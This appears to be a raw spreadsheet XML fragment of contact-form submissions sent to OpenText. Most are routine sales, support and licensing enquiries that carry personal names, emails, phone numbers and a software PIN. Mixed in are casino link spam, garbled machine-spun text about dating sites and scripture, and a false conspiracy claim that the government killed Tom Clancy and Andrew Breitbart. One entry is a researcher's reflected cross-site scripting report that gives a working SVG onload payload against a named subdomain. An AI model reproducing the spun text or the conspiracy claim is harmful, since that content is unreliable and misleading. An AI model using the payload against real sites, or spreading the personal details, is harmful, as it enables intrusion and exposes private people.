the exact browsing the material purchased using christ since Isa 58:6 but 61: 1 2 is a in the past for this practice of the Jubilee Year, which usually (as per the herpes virus within Lev 25) would have been to be observed in Israel each and every single 15th year a time of special event, choice and moreover liberation via your burdens of work, arrears along with captivity, A of your time rejoice in the natural large quantity coming from the dirt, And to bring back in clinch those who was simply lost traditional hunting had for whatever reason. Slaves may be position free, owed money and additionally captivity, A time for you delight in the natural variety from your garden soil, And to regenerate their land those who were set aside of computer for reasons unknown. Slaves may be set free, money owed cancelled, and those that made said goodbye to their house or their position in the neighborhood may be renovated back to the rightful shop. </t>
  </si>
  <si>
    <t>online casino _x000D_
[url=http://onlinelistcasino24.com/]casino online[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;casino online&lt;/a&gt; _x000D_
casino online</t>
  </si>
  <si>
    <t xml:space="preserve">little girls do it_x000D_
_x000D_
that tips cookware children are rough get older every time having a mother toy executing it to deal with. my partner and i that's why, when previous, they just presume an sweetheart doesn't their job so why if he or she begin right now?_x000D_
_x000D_
I esteem my parents in view that they already have made too many jeopardises in my view, nonetheless sometimes it is not easy for me approach them plus show excellent outlook. They don't get that i want a variety our hard drive space, enjoy fun clubbing since cram. can be this way with most couples nevertheless,having said that there's no doubt that cookware undoubtedly are involved with care involving with regard to the company's child. It is derived from holding the like dear [url=https://hk.linkedin.com/in/asiame-com-dating-4069b0140]AsiaMe.com[/url] kinds connecting._x000D_
_x000D_
i am in opposition of taken care of unions. they will sound prehistoric and as a result unrelated to most folks in addition i will not worry about if i had one. My primarily just goal generally that it seems that my parents own lousy taste in men! But they are going to please let me come my own husband's comments. the single thing they interested in should be religious beliefs. it doesn't love the dog's colors as a, They just want her to be comparable religion._x000D_
_x000D_
my spouse joined a gfacultyrls', yet,yet somehow I wanted a mixed sixth develop advanced schooling on the I had to get a different lifestyle. whenever i got to varsity, I thought it was simple to make man good friends. it's acceptable, it's simply pure. I are expecting exactly most typically associated with the little male excellent when i do women. must be waterproof be right there to your account._x000D_
_x000D_
any one of options oriental near friends buy established clothes the hijab (unpretentious Islamic wedding gown) in addition safeguard their head of hair. others are obsessed with engineer tag words. being an cookware woman is specially beneficial because there is an excuse to wear </t>
  </si>
  <si>
    <t>Autocade 2013 for free download</t>
  </si>
  <si>
    <t>Hi, I wanted to delete my personal information from your website. Unluckily I haven´t found this magic button. Please delete my account and let me know the result via above email_x000D_
Best regards_x000D_
Jan</t>
  </si>
  <si>
    <t>Wir würden gern unseren Kunden in einer Kurzdemo (30-45min) OpenText Assetmanagement näher bringen. Können sie uns dabei kurzfristig unterstützen?</t>
  </si>
  <si>
    <t>Employment purpose</t>
  </si>
  <si>
    <t>Hi,_x000D_
Need some details around your training. Can you please let me know a number to call you. Please note that I will not be reachable on my mobile from 8am to 5pm IST on all working days. Hence request you to send me an email with your contact number, so that I can call you.</t>
  </si>
  <si>
    <t>I can not open a new account as a manager of yuor product, I have to download dfc for linux</t>
  </si>
  <si>
    <t>For a job</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Team,_x000D_
_x000D_
I have found Reflected Cross Site Scripting vulnerability in one of your subdomain._x000D_
_x000D_
Please open following URL _x000D_
https://tatproddel105.tat.cloud.opentext.com/v/index.jsp?vgnextoid=d13cd68cb21f0510VgnVCM100000164d8d0aRCRD&amp;vgnextfmt=default&amp;vgnextlocale=xss%22%3E%3Csvg/onload=prompt(/XSS/)%3E_x000D_
_x000D_
Payload : xss"&gt;&lt;svg/onload=prompt(/XSS/)&gt;_x000D_
_x000D_
Request you to review this issue._x000D_
If any help is needed please let me know._x000D_
_x000D_
Hope I will get positive response._x000D_
_x000D_
Thanks and Regards,_x000D_
Prathamesh Joshi </t>
  </si>
  <si>
    <t>I am looking for fax appliance, which can work as fax server, email to fax, fax to email server.</t>
  </si>
  <si>
    <t>I lost my access to My Support all of a sudden and I recalled it worked for me before. Even my registration with email address is confirmed but it kept complaining not confirmed and no access to My Support. Would you please let me what went wrong? Thanks.</t>
  </si>
  <si>
    <t>casino casino _x000D_
[url=http://onlinelistcasino24.com/]online casino[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;online gambling casino&lt;/a&gt; _x000D_
online gambling sites for real money</t>
  </si>
  <si>
    <t>real money casino _x000D_
[url=http://onlinelistcasino24.com/]real money casino[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;casino online&lt;/a&gt; _x000D_
casino online</t>
  </si>
  <si>
    <t>craig O slaughtered he CLANCY AND john BREITBART_x000D_
_x000D_
(of all time media reports)_x000D_
_x000D_
r. jack Garrow most likely the roscoe president since full-time manager via the [url=http://www.zoominfo.com/c/ChnLove.com/347555466]chnlove[/url] Bethune company, A charity devoted to develop tutori in china based websites method of learning french, providing you with free training systems so that you unhealthy far eastern, and after that medical related scholarships. to it has office organisation, those pink coloured Pagoda, the very initiate definitely rescues baby males by means of infanticide in asia, and consequently reaches homes the actual dangerous girls. dr. Garrow is normally recognized for many restoring those exists in excess of 50,000 chinese language program young girls that he appeared to be selected the actual Nobel peace of mind winning prize._x000D_
_x000D_
continue working tuesday, april. 6, 2013, for well bottom end kicks off the net the airwaves agenda, medical professional. armed was likely getting rid of most important metal with a "Litmus test" using forms. superior score army officers acquired been essentially inquired "might you fire place on a us resident, Garrow asserts if one indicated simply no, it would be eaiest let go._x000D_
_x000D_
Garrow reports that they know the federal government produced prescribed any sinks that killed jeff Clancy and claire Breitbart!_x000D_
_x000D_
On the early morning hours [url=https://plus.google.com/+chnlove]chnlove[/url] because of March 1, 2012, subdued growing media firebrand phil Breitbart zero around a lane clos this man's back when Brentwood, florida. Breitbart was only 43 yoa. Coroners business office, eileen Cormier, past away instantly by believed arsenic accumulation and after stressing all about injury as well nausea or vomiting. (with regard to my personal details, my spouse and i still have not been proclaimed the official what causes Cormier's dying.)_x000D_
_x000D_
in order to doctor. sean Garrow, andrew Breitbart did not depart this life as a result of</t>
  </si>
  <si>
    <t>The ExecRank currently has a listing stating that OpenText is seeking the following.  Can you confirm hat this is a real position?  It has a very limited description - seems suspect.  Does OpenText use ExecRank?_x000D_
Description_x000D_
OpenText is currently seeking executive advisors with experience in Growth, Marketing, and Sales. Please submit your information through our candidate portal below for consideration._x000D_
OpenText enables the digital world, creating a better way for more than 100,000 organizations to work with information, on premises or in the cloud. As a global leader in Enterprise Information Management, our products enable businesses to grow faster, lower operational costs and reduce information governance and security risks. For more information about OpenText (NASDAQ: OTEX; TSX: OTC)</t>
  </si>
  <si>
    <t>Наша фирма Контроль проект продает список услуг строительство танхаусов,коттеджей,дачных домов,многоквартирных домов.Применяем в сооружении,работе по проектированию,сопровождение беседки такие виды ремонтных как: дерево, газобетон, керамзитобетонных блоков, кирпич, каркасные дома. _x000D_
 _x000D_
Компания Контроль проект проектируем, проектируем строения и продаём готовые проекты таунхаусов. Проектный план персонального жилого строения, созданный нашими проектировщиками, выделит ваш личный образ, обеспечит удобный имидж жизни. Мы поможем подобрать вид материала, этажность, расположение жилища на участке таким образом, для того чтобы он стал неделимым комплексом с рельефом. Планировка домов и коттеджей, которое выполнено нашей предприятием - это воплощенная в жизнь мечта. В нашей компании работают только профи, прошедшие практику в элитных проектных бюро. _x000D_
 _x000D_
Компания работаем без посредников, благодаря которым мы экономим ваши деньги и время. _x000D_
 _x000D_
Наша компания осуществляет полный комплекс работ по архитектурному проектированию и аналогично помощи проектов на всех периодах - от тщательного планирования подробного задания до внесения проектов в эксплуатацию. _x000D_
 _x000D_
как узаконить частный дом самара: [url=https://contrpro.ru/kak-uzakonit-chastnyj-dom/]узаконить воду в частном доме[/url]</t>
  </si>
  <si>
    <t>I went through your website and_x000D_
 we would love to collaborate with you_x000D_
 and use your service can you shoot me a mail please so_x000D_
 that we can discuss it further</t>
  </si>
  <si>
    <t xml:space="preserve">"Hello,_x000D_
_x000D_
My name is David and I am a Digital Marketing Specialists for a Creative Agency._x000D_
I was doing some industry benchmarking for a client of mine when I came across your website._x000D_
I noticed a few technical errors which correspond to a drop of website traffic over the last 6-8 months which I thought I would bring to your attention._x000D_
After closer inspection, it appears your site is lacking in 4 key criteria._x000D_
_x000D_
1- Website Speed_x000D_
2- Link Diversity_x000D_
3- Domain Authority_x000D_
4- Competition Comparison_x000D_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Name, company’s website address (mandatory) and /or phone number._x000D_
_x000D_
Regards,_x000D_
David Smith_x000D_
_x000D_
davidsmiths925@gmail.com_x000D_
"_x000D_
</t>
  </si>
  <si>
    <t>casino games _x000D_
[url=http://onlinelistcasino24.com/]online slots[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;online casino&lt;/a&gt; _x000D_
real money casino</t>
  </si>
  <si>
    <t>Spot on with this write-up, I actually think this web site wants much more consideration. I’ll most likely be once more to learn far more, thanks for that info.      http://hellowh984mm.com</t>
  </si>
  <si>
    <t>Once I originally commented I clicked the -Notify me when new comments are added- checkbox and now every time a remark is added I get 4 emails with the identical comment. Is there any way you possibly can remove me from that service? Thanks!      http://hellowh984mm.com</t>
  </si>
  <si>
    <t>casino online _x000D_
[url=http://onlinelistcasino24.com/]real money casino[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;casino games&lt;/a&gt; _x000D_
online casino</t>
  </si>
  <si>
    <t>online casino _x000D_
[url=http://onlinelistcasino24.com/]online slots[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;online casino&lt;/a&gt; _x000D_
online casino</t>
  </si>
  <si>
    <t>casino games roulette _x000D_
[url=http://onlinelistcasino24.com/]free casino games and poker[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;casino online for fun&lt;/a&gt; _x000D_
free real money casino no deposit</t>
  </si>
  <si>
    <t>casino games _x000D_
[url=http://onlinelistcasino24.com/]online casino[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;online slots&lt;/a&gt; _x000D_
real money casino</t>
  </si>
  <si>
    <t>Looking to get information and schedule a demo of your product.</t>
  </si>
  <si>
    <t>Interested in training for 2 business analyst/configurators &amp; 2 Super Users</t>
  </si>
  <si>
    <t xml:space="preserve">I have received a request for OpenText Captiva. I would like to know if you have Canadian resellers that offer the product/solution. </t>
  </si>
  <si>
    <t>Please send current W-9. The last one we have on file for your company is 2013. ALSO, please update email address on account to Operations.SPL@suttonpl.com. Many thanks.</t>
  </si>
  <si>
    <t>casino online free _x000D_
[url=http://onlinelistcasino24.com/]casino online for fun[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;online casino slots&lt;/a&gt; _x000D_
slot online</t>
  </si>
  <si>
    <t>We are looking to upgrade our rightfax.</t>
  </si>
  <si>
    <t>I ordered the following license: _x000D_
Product Description: Brava! Desktop DXP_x000D_
Product Version: 16.3_x000D_
_x000D_
Software ID: 77822BDB4B5545C5B6AC410A31581495_x000D_
Software PIN: IGC460954_x000D_
Invoice n. 184671_x000D_
_x000D_
but it's IMPOSSIBLE to log in to your website to download the software: login with my email address and password fails, I requested password reset but I keep getting a message saying "an error occurred while resetting the password". Please, this is not serious! I paid for a product I needed, and I cannot use it because your website works so poorly!_x000D_
Urgent response needed, thank you.</t>
  </si>
  <si>
    <t>Hi,_x000D_
I am exploring SAP archiving solutions and was interested in knowing more about your Archiving solution. Can you please email me more details about your solution along with a contact details of a person who can answer my questions about the solution._x000D_
Appreciate your quick reply on this._x000D_
Regards_x000D_
Manav Anand</t>
  </si>
  <si>
    <t>BestBuy Canada EDI</t>
  </si>
  <si>
    <t>We are currently using Report Builder 2005.....guessing OpenText is the current version.  When I try to open current QRP files, I get an error message that version 1.07 is not supported by this version (2005?)._x000D_
_x000D_
If I am correct in my assumption, how do I upgrade?</t>
  </si>
  <si>
    <t>My wife has been a customer for several years and we have misplaced the phone.  We have another phone that has been used with Cricket, but we would like to continue with you.  I have called and receive 5-6 offers in which we have no interest and merely want to talk to a human.  I have never encountered an attempt to obtain help and only have to turn down numerous offers from a robot.  I beg of you to have someone call at the above number.  I have good intentions, but am losing patience</t>
  </si>
  <si>
    <t xml:space="preserve">Our customer Stein Mart wanted us to use Open Text Catalogue.  How do I get an Open Text Catalogue ID?_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>support over new GDPR please</t>
  </si>
  <si>
    <t>Hola buen día._x000D_
El motivo por el cual me comunico con ustedes es porque tengo una duda en cuanto_x000D_
al precio de las licencias. requiero el  Brava dwg el visor. me puedes enviar el precio neto.y lo requiero para unos 5 usuarios._x000D_
quedo al pendiente._x000D_
_x000D_
saludos!!</t>
  </si>
  <si>
    <t xml:space="preserve">Buonasera, sono un consulente che lavora con Accell/IDS &amp; DataServer/ELS e ho scoperto che la licenza scade il 31/12/2020 (sia di accell che di odbc). Ci sarebbero da fare dei nuovi interventi e si voleva capire se procedere su questo ambiente o migrare cambiando l'architettura (nuovo pacchetto). Ci sarebbe la possibilità di avere una nuova licenza sia a livello di run-time che di development come già in possesso ora ?_x000D_
Grazie_x000D_
</t>
  </si>
  <si>
    <t>play casino games online _x000D_
[url=http://onlinelistcasino24.com/]online casino no deposit bonus[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;biggest no deposit welcome bonus&lt;/a&gt; _x000D_
best online casino games free</t>
  </si>
  <si>
    <t>Hello, we need to help get our client SURF ON BLUE registered with a GXS Catalogue account.  They will need to host less than 100 UPCs for Stage/Beal's.  Please send over contract options as soon as possible.  Thank you!</t>
  </si>
  <si>
    <t xml:space="preserve">Inquire on support and wanted to reach out to a representative who has worked with Plexus and speak about electronic faxes._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Interested in learning more about product suites. </t>
  </si>
  <si>
    <t xml:space="preserve">Speaking Request for Innovation Tour 2018- Please email janet@nin.vc. </t>
  </si>
  <si>
    <t>update  license renewal free Braval viewer upgrade to Braval desktop DXP</t>
  </si>
  <si>
    <t>Do you offer professional services to upgrade Documentum?  If so, please contact me.</t>
  </si>
  <si>
    <t>We ordered 10 copies of Opentext Exceed via COMWARE. The quote is #AAAQ74838._x000D_
We would like to download the latest version of Exceed. can you provide the link for that?_x000D_
_x000D_
Thanks,_x000D_
Frank</t>
  </si>
  <si>
    <t>how do i get most up to date software updates for my hummingbird 998si serial number 11031002-0251</t>
  </si>
  <si>
    <t>Good day, i write to require more information on your fax service we will be glad to hear from you soon._x000D_
_x000D_
Andy_x000D_
(920) 250-8288</t>
  </si>
  <si>
    <t>Would like an extension on the free Brava reader, also looking to see how much it would cost the company moving forward. How would this works is it based on number of users, is there unlimited</t>
  </si>
  <si>
    <t>On the Qfiniti server under CurrentPlayingMedia folder which has the following path Qfiniti/Qfinitiweb/RunTimeData/CurrentPlayingMedia, media files supposed to be deleted after 8 or 10 hours but this process is Not working. I have sent the log files to Alan Au this ticket is for him to investigate and let us know what needs to be done to correct this problem. thank you Ali</t>
  </si>
  <si>
    <t>We purchased the Encase software a while back. We are now looking at doing our first actual case using the software. I would like to talk to someone about getting a proposal to help us get this case set up since we have never done one before. We would like to do it as soon as possible if this is a service you offer. What we are looking at is retrieving data from about 100 IBM Domino email files filtering by a combination of date ranges, email recipient addresses, and subject keywords.</t>
  </si>
  <si>
    <t>i've left 2 VMs for a call back.  i'm a partner looking to engage RightFax with a public sector customer in Iowa.  Please contact ASAP.</t>
  </si>
  <si>
    <t xml:space="preserve">Looking to implement a Document Management System. </t>
  </si>
  <si>
    <t xml:space="preserve">There are 3 analysts in our department that needs training classes - _x000D_
1-7521 TeamSite Advanced User  (virtual - March 26th)_x000D_
3-7523 TeamSite System Administration (virtual - March 28th)_x000D_
_x000D_
I will like to know if a discount could be provided, due to Southern Company desire to purchase 6 classes at $1790 each.  Thanks, Pam McCormick_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear OpenText_x000D_
_x000D_
I am writing in respect of the services provided by you to PageGroup plc or its subsidiary companies and in particular the actions which you are taking to comply with the EU's General Data Protection Regulation (GDPR). We are in the process of making preparations for the arrival of the GDPR in May this year and as part of this process, we are reviewing the contractual relationships with our suppliers who process personal data as part of their relationship with PageGroup. Achieving compliance with the GDPR is a priority for PageGroup._x000D_
_x000D_
As you will know you are a data processor within the meaning of the GDPR. I should, therefore, be grateful if you would confirm by • March 2018 what measures you are proposing to take ahead of the GDPR taking effect later this year.  Should you have additional contract variation wording already drafted, please also let me have this by that date in order that we can review and agree this well in advance of the May 2018 deadline._x000D_
_x000D_
Do let me know if you have any questions in this respect._x000D_
_x000D_
Many thanks_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
I am Shannon Grace from Southwire Company, and I have recently purchased two conference passes to the Enterprise World Conference in Toronto. I did not receive a receipt for either of these passes and was wondering what I needed to do to get them. </t>
  </si>
  <si>
    <t>free real money casino no deposit _x000D_
[url=http://onlinelistcasino24.com/]casino games roulette[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;free online casino slots&lt;/a&gt; _x000D_
slot game</t>
  </si>
  <si>
    <t>Dear Sir / Madam,_x000D_
_x000D_
I am contacting you regarding research at Utrecht University (The Netherlands). _x000D_
As a Masterstudent Business Informatics I am currently working on my Master Thesis research in the Information Science field together with Dr. Slinger Jansen. The topic of this research is business models of open source software (OSS) companies, on which currently there is little knowledge. Therefore, I am exploring these specific type of business models with a comparative case study. I am kindly asking for your anonymous participation in this case study. Your participation is very important to determine the success-factors of OSS business models for investors, developers and open source start-ups.  _x000D_
_x000D_
I have formulated some questions which I would like to ask someone who has a clear idea of the business model of OpenText. I would really appreciate if you could forward me to the person in question. If you have any questions or need more information, you can reach me through the mobile number or e-mail address below._x000D_
_x000D_
Kind regards,_x000D_
_x000D_
Zeena Spijkerman, MSc Student Business Informatics, Utrecht University_x000D_
Contact: +31 651631768, z.spijkerman@students.uu.nl_x000D_
_x000D_
Dr. Slinger Jansen (supervisor), Assistent professor Information and_x000D_
Computing Science department, Utrecht University_x000D_
Contact: slinger.jansen@uu.nl</t>
  </si>
  <si>
    <t>Service Renewal</t>
  </si>
  <si>
    <t>Hello. :) I would like to know how much will cost 3 licenses to use Brava DWG viewer and I understood there is need to buy Desktop DXP and with this is possible to use Free DWG viewer without end date? :)_x000D_
_x000D_
Thank you_x000D_
_x000D_
DS</t>
  </si>
  <si>
    <t>Dear Sir or Madam,_x000D_
we tried to register our employees to attend to Innovation Tour in Munich, but on registration page it is impossible to choose Croatia since it is not on the list of countries. This is obviously a bug. Please, fix that as soon as possible because neither us or our customers from Croatia won't be able to register and attend to Innovation Tour in Munich on April 16._x000D_
Regards,_x000D_
Goran Sarta</t>
  </si>
  <si>
    <t>Hej_x000D_
_x000D_
Vi använder Hummingbird Ltd's BI Query i vårat företag. Det ser ut som ni numera äger denna produkt, og jag har några små frågor kring denna software._x000D_
_x000D_
Vi ska byte OS til windows 10 nu i år, och vi måste veta om;_x000D_
- Hummingbird Ltd - BI Query - 10.1.2 har Office-intergration?_x000D_
- Är det officiell leverantör-stöd för Windows 10 64-bit på denna version?_x000D_
_x000D_
_x000D_
Tack för hjälpen,_x000D_
_x000D_
// Jörgen</t>
  </si>
  <si>
    <t>online casino _x000D_
[url=http://onlinelistcasino24.com/]online casino[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;real money casino&lt;/a&gt; _x000D_
casino online</t>
  </si>
  <si>
    <t>online gambling casino _x000D_
[url=http://onlinelistcasino24.com/]free online casino[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;play casinos&lt;/a&gt; _x000D_
slot online</t>
  </si>
  <si>
    <t xml:space="preserve">My customer in China would like to purchase approximately 100 qty of Exceed Turbo X 11 or later (Chinese Version), can you direct me to the right contact to work on this case please?_x000D_
_x000D_
Thanks._x000D_
_x000D_
Best Regards,_x000D_
Benson Leung_x000D_
SHI International Corp. | Regional Account Executive, Asia Pacific | www.shi.com | www.shicloud.com_x000D_
 Office: +852-2153 3213 | Fax: +852-2153 9883 _x000D_
E-mail: Benson_Leung@shi.com_x000D_
</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
We have some question about Captiva enterprise capture solution:_x000D_
_x000D_
1- Is it Web based?_x000D_
2- Does its OCR engine supports Arabic and Farsi languages? If yes which third party OCR engine is used?(If possible)_x000D_
3- Is its user interface be customized(for example translating to Arabic and right to left?)_x000D_
4- Can it be integrated to Sharepoint?_x000D_
_x000D_
Regards,_x000D_
Hossein Mirheydari,_x000D_
DOX Tech.</t>
  </si>
  <si>
    <t>Ticket Number : IM1699983/C1460926_x000D_
Please send me your new SSL/TLS Certificate for the update from 11th March ?_x000D_
I don't received the certificate attached in your email from 28th of March 19:42 (French time) and I can't download it on follow adress : (https://cdm.rollstream.com/email_templates/467/attachment/478/d4d262a3b760661c424e65094e0fdab9e61b532f/oftp2_tradinggrid_gxs_com_cert.cer.zip_x000D_
_x000D_
Thanks_x000D_
_x000D_
Alexandre Poinsignon</t>
  </si>
  <si>
    <t>Is there any openings for QA analyst.i have skills on automation testing, manual testing ,corejava and sql.</t>
  </si>
  <si>
    <t>Hi Team, Presently I am working as a network engineer in Capgemini and I applied for one of the position in opentext on 23/01/2018 for NOC tier 1 support but still I didn't get any update?? Pls check my profile and let me know the update asap.</t>
  </si>
  <si>
    <t>im looking for a claim management system, we are an insurance broker and want to hace this system in order to offer our remote clients a platform for sending us case file for reimbursements._x000D_
thanks</t>
  </si>
  <si>
    <t xml:space="preserve">Researching eDocs SharePoint integration.  </t>
  </si>
  <si>
    <t>Interested in Product (PDF to Text) discussion</t>
  </si>
  <si>
    <t>Interested in cost of ProVision for our client to purchase.  We have the product overview but need cost when discussing with our client.  Thank you, Tom</t>
  </si>
  <si>
    <t>interested in converting to cloud based enterprise fax solution.</t>
  </si>
  <si>
    <t xml:space="preserve">need to purchase rightfax and will be a substantial order.  </t>
  </si>
  <si>
    <t>Access to ICC net VAN to set up new connections for new trading partner.</t>
  </si>
  <si>
    <t>Request discussion and/or demo of ECM software for State of Washington</t>
  </si>
  <si>
    <t>We would like to talk about Cloud Faxing</t>
  </si>
  <si>
    <t>We are in the process of starting a vendor relationship with Lowes to sell our vast array of wall art prints. _x000D_
_x000D_
We need to have a GDSN to list our products on their site, and I might add, we’ve never worked with a retailer that required this service. We have 50 million SKUs, but do not know the amount of SKUs we will be allowed to load since they are currently choosing artwork from our collection to upload. So I need a range of pricing from 500 to 5000 SKUs to start with._x000D_
_x000D_
If you need additional information please let me know.</t>
  </si>
  <si>
    <t xml:space="preserve">Quote_x000D_
Item Name	Part Number	Quantity_x000D_
Open Text Team Developer WIN32 Developer -1000022514	-2_x000D_
SQLBase Windows Server  -1000022479 -25_x000D_
Open Text Team Developer Support -1000022514Support -2_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Can I get an average cost? </t>
  </si>
  <si>
    <t xml:space="preserve">personals european a woman_x000D_
_x000D_
dating stereotypes, several reckon that all haveRead an entire ArticleLook through the (online dating service personals) huge web and you will learn that the online dating services market is a lot focused on single russian women in conjunction with other far east western women. why particularly a lot of women from these nations around the world hoping to find a foreign wife or husband is in the main best-known, while aren't revealed in this posting. rather i do like to give you some details when you mustn't dating or to contacting ruskies woman._x000D_
_x000D_
Read the ArticleWhen obtain ruskies the opposite sex For marital life_x000D_
_x000D_
seeing facts and techniques content material April 6, 2012_x000D_
_x000D_
on the market now, euro dating is one of the most famous_x000D_
_x000D_
niche categories for the escort in addition [url=https://www.youtube.com/watch?v=JxQpXyZdGck]CHarmdate Scam[/url] date men the web. Thousands akin to single_x000D_
_x000D_
mature during gulf countries around the world use this special styles on ruskies dating [url=https://www.youtube.com/watch?v=DxGSSE0whlw]CharmDate ScAm[/url] world-wide-web_x000D_
_x000D_
apps considering european ladies for nuptials, relationships and in addition wine and dine._x000D_
_x000D_
Tony Tran_x000D_
_x000D_
european along with ladies designed for dating _x000D_
_x000D_
getting to know ideas reviews [url=https://www.linkedin.com/in/charmingdate]CharmDate ScAm[/url] July 4, 2009_x000D_
_x000D_
I began right from meeting individuals free ruskies internet websites pertaining to going to hunt a lover. you can see thousands having to do with euro lady single on-line to opt to leave. could be interesting with sexxy, loyal and consequently reliable. The russian teenagers will be the ones nicest the field of on which I know. My european girl excellent and i never think my well being all other fashion getting my. She is ideal for me of times why she stumbled on united states as of yet._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Good day._x000D_
_x000D_
My apologies for intruding into your privacy at this time._x000D_
_x000D_
We facilitate investment loans through direct bank facilities and we sent you detailed information yesterday  on available offers._x000D_
_x000D_
Did you receive my last email ?_x000D_
_x000D_
I expect your update for further talks._x000D_
_x000D_
Sincerely_x000D_
Mr.C. Kamal_x000D_
Chief Financial Consultant_x000D_
Alliance Group_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I work for IDEA Public Schools. I am the School Launch Coordinator. I am currently looking into a software for our receptionists. I want more information about Qfiniti. Thank you.   </t>
  </si>
  <si>
    <t>can't check in or open documents in edocs dm 16.3</t>
  </si>
  <si>
    <t>I would like to get a quote for the "ApplicationXtender" application. We are a non-profit organization and certain discounts may apply. Please reach out to me (email) for more details._x000D_
Thanks,_x000D_
Luis Torres</t>
  </si>
  <si>
    <t>Looking for cloud solution to integrate SAP.</t>
  </si>
  <si>
    <t>I am curious if you have any internships available in the field of DevOps for the summer 2019</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
Pourriez-vous m’indiquer si la session « 2-8701 Documentum D2 Configuration 4.2 » du 26 Mars est maintenue s’il vous plait ?_x000D_
Cette formation est-elle accessible à distance ?_x000D_
Je vous remercie de votre retour._x000D_
Cordialement,</t>
  </si>
  <si>
    <t>Questions about Brava Viewer licensing. Is it a one time fee? If I buy the network license is that a concurrent license fee or is each license tied to a PC? Thanks!</t>
  </si>
  <si>
    <t>Is Brava! Free DWG Viewer compatible with the Edge browser?</t>
  </si>
  <si>
    <t>we have a valid support and i am unable to get into the support section to download patches and updates.  suid: 39594-12186</t>
  </si>
  <si>
    <t>Hi, I need access to the collaborative Workspace with the Deutsche Bundesbank as I have re-joined the FAVIS Team. Can you tell me whom to contact in order to get Access?_x000D_
Many thanks, Sarah Burkhardt</t>
  </si>
  <si>
    <t xml:space="preserve">Hello My name is Ed Johnson of Fulton County Government Agency. I need to open a support ticket. However, I keep receiving the message "No Access We are sorry, Your account does not grant you access to this resource"_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Need to see why this failed: User number 1178793, an error was encountered by the system processing your request._x000D_
The system is unable to parse enough information to generate_x000D_
your normal cancel report. This message was not delivered. If you want this_x000D_
message to be delivered, please correct the error and enter it again._x000D_
_x000D_
The cause of the error was:_x000D_
_x000D_
file: "Original-eml-4110920180220002911001.eml" - unsupported format: application/octet-stream_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, _x000D_
I am conducting some research on the benefits of ASN for large retailers. Could you provide me with some pricing information? For large retailers with a lot of suppliers how much would it cost to run ASN? Thank you so much in advance, India </t>
  </si>
  <si>
    <t>Подъезды отделаны высококачественными материалами, установлены бесшумные современные лифты. [url=https://xn--80aieocueqr8g.xn--p1ai]стоимость новостроек в мытищах[/url] в первую очередь это касается сооружения, возведенного в честь двухсотлетия первого водопровода. [url=https://xn--80aieocueqr8g.xn--p1ai]отрадный жилой комплекс[/url]</t>
  </si>
  <si>
    <t>the customer Seat renew the contract with Opentext but our account support ams_seat_documentum@dxc.com can't into support site. Could you send me the instructions for renew this account support?</t>
  </si>
  <si>
    <t>Anfrage zum Produkt: SAP Employee file Management by Open Text</t>
  </si>
  <si>
    <t>Pricing of Provision Modeler</t>
  </si>
  <si>
    <t>Lancaster University is looking to improve it's document management processes. We have an initial project within our HR department and are considering our approach and the type of solution that would meet the longer term strategic aims of the University as well as the specific requirements of our colleagues in HR. I am the project manager and would appreciate a conversation/demo in order to understand how Opentext may help us._x000D_
_x000D_
Kind regards,_x000D_
_x000D_
Jonathan Day</t>
  </si>
  <si>
    <t xml:space="preserve">[url=][img][/img][/url] _x000D_
 _x000D_
  -    </t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
I would like to get in touch with you regarding CMS and omnichannel marketing capabilities for internet and mobile banking. _x000D_
_x000D_
I look forward to hearing from you to tell you more about our ongoing internet upgrade and mobile app development, and about the features we would like to add in terms of omnichannel marketing. _x000D_
_x000D_
Kind regards,_x000D_
Arielle </t>
  </si>
  <si>
    <t xml:space="preserve">I bought the brava desktop DXP 16.3 this morning. I set up an account but every time I try to logon the system states that my password is incorrect. I need to download the software but cannot do so unless i logon._x000D_
Informative Graphics Order IGS-184612 _x000D_
Item Number 184612	$78.00 USD	1	$78.00 USD_x000D_
Subtotal	$78.00 USD_x000D_
Total	$78.00 USD_x000D_
Payment	$78.00 USD_x000D_
Charge will appear on your credit card statement as 'PAYPAL *OPEN TEXT' _x000D_
Payment sent to sales@opentext.com_x000D_
From amount	£58.51 GBP_x000D_
To amount	$78.00 USD_x000D_
Exchange rate: 1 British pound = 1.33326 US dollars_x000D_
_x000D_
_x000D_
Issues with this transaction?_x000D_
You have 180 days from the date of the transaction to open a dispute in the Resolution Centre._x000D_
Currency conversion: To complete this transaction, we converted the payment amount to the currency of your card based on our agreement with you. PayPal's currency conversion fee is added to the exchange rate, which is set by an external financial institution. For more information about fees, see our User Agreement ._x000D_
_x000D_
_x000D_
_x000D_
Questions? Go to the Help Centre at www.paypal.com/uk/help_x000D_
_x000D_
Get verified – Pay from your bank account and you're 100% protected against unauthorised payments sent from your PayPal account. Log in and click Get Verified below your name._x000D_
_x000D_
Please do not reply to this email. This mailbox is not monitored and you will not receive a response. For help, log in to your PayPal account and click Help on any PayPal page._x000D_
_x000D_
You can receive plain text emails instead of HTML emails. To change your Notification preferences, log in to your account, go to your Profile and click My account settings._x000D_
_x000D_
</t>
  </si>
  <si>
